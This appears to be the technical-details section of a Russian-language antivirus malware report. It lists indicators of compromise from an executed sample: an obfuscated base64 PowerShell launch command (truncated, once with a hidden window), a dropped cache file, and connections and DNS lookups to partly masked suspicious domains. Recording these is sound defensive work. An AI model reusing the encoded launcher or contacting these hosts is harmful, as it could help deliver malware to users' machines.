Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAG8AaQA3AHgAagAwAD0AKAAoACcATgAzACcAKwAnAGIAZwAnACkAKwAoACcAcwAnACsAJwBjAHMAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABFAG4AdgA6AFQAZQBtAHAAXABXAE8AUgBEAFwAMgAwAD...
- '%CommonProgramFiles(x86)%\Microsoft Shared\DW\DW20.EXE' -x -s 3836
- %LOCALAPPDATA%\microsoft\penworkspace\discovercachedata.dat
- 'ho#####technologies.com':443
- 'x1.#.lencr.org':80
- http://x1.#.lencr.org/
- 'ho#####technologies.com':443
- DNS ASK ca###oomz.com
- DNS ASK ne###ekulac.com
- DNS ASK ho#####technologies.com
- DNS ASK x1.#.lencr.org
- DNS ASK to#####aelconfort.com
- DNS ASK aa#####itibhusawal.org
- DNS ASK di###rmedia.com
- DNS ASK av##mda.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAG8AaQA3AHgAagAwAD0AKAAoACcATgAzACcAKwAnAGIAZwAnACkAKwAoACcAcwAnACsAJwBjAHMAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABFAG4AdgA6AFQAZQBtAHAAXABXAE8AUgBEAFwAMgAwAD... (со скрытым окном)